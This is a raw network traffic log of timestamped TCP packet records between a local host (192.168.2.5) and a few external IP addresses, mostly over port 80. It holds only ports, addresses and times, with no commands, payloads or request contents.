Sep 27, 2024 04:21:16.531829119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531841040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531851053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531851053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531886101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531924963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531924963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531949043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531960011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532005072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532005072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532043934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532054901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532064915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532075882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532085896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532104015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532109976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532109976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532120943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532162905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532162905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532162905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532191992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532202959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532216072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532226086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532232046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532252073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532275915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.532433033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.532541990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.536547899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536614895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536623955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536643028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536654949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536665916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536674023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.536710024 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.536717892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536731005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.536739111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.536765099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.551764965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551779985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551798105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551810026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551820993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551831961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551836014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.551845074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.551868916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.552051067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.552083969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.552098036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.558640003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558666945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558679104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558743954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.558743954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.558819056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558830976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558840990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558851957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558864117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558888912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.558913946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.558953047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.558984995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.558996916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559010983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559021950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559031963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559035063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559041977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559075117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559091091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559092045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559106112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559117079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559128046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559139013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559163094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559163094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559180975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559185028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559197903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559207916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559217930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559230089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559240103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559242964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559242964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559286118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559286118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559302092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559314013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559324026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559334993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559345007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.559355974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559355974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559376955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.559411049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.577450037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577476978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577488899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577502966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577514887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577522993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577532053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577544928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577559948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577562094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577606916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577606916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577649117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577661037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577672005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577682018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577688932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577694893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577698946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577709913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.577719927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.577749968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579068899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579081059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579092026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579118013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579138041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579139948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579150915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579161882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579174042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579185963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579188108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579206944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579235077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579255104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579267025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579284906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579302073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579320908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579340935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579351902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579361916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579372883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579379082 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579396963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579401016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579411030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579412937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579444885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579541922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579552889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579565048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579576015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579586983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579591036 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.579601049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579636097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.579668045 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579669952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579683065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579694033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579696894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.579700947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579722881 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579763889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579799891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579812050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579823017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579833031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.579843998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579849958 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.579854965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579865932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579878092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579895020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579898119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.579905033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579907894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.579924107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.579935074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580003023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580014944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580027103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580037117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580044985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580074072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580074072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580104113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580116034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580147028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580161095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580176115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580188036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580198050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580209970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580216885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580221891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580225945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580234051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580243111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580250978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580269098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580279112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580430984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580451012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580461979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580472946 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580477953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580486059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580490112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580497980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580508947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580519915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580530882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580539942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580547094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580553055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580566883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580579042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580579042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580579042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580579042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580626011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580689907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580734015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580739975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580743074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580758095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580768108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.580771923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580795050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580831051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.580867052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.580877066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.580883026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.580893040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.580904961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.580935955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.580935955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.580960035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.581357002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.581370115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.581382990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.581414938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.581449032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.586154938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586205006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586211920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586215973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586235046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586251020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586270094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586271048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586282015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586294889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586303949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586308002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586322069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586353064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586380005 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586402893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586415052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586426020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586437941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586441994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586450100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.586457968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586479902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.586505890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613023043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613085985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613136053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613147020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613153934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613161087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613171101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613183022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613182068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613210917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613246918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613272905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613285065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613296032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613318920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613338947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613360882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613373041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613384008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613399982 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613415956 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613439083 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613802910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613815069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.613846064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.613863945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.615490913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615504026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615515947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615567923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.615567923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.615581036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615595102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615607023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615617990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.615633965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.615675926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.615675926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.616972923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.616997004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617007017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617017984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617037058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617037058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617065907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617069006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617080927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617110968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617120981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.617120981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617120981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617144108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.617286921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.620381117 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.621763945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621778965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621794939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621802092 CEST	80	49725	185.215.113.117	192.168.2.5
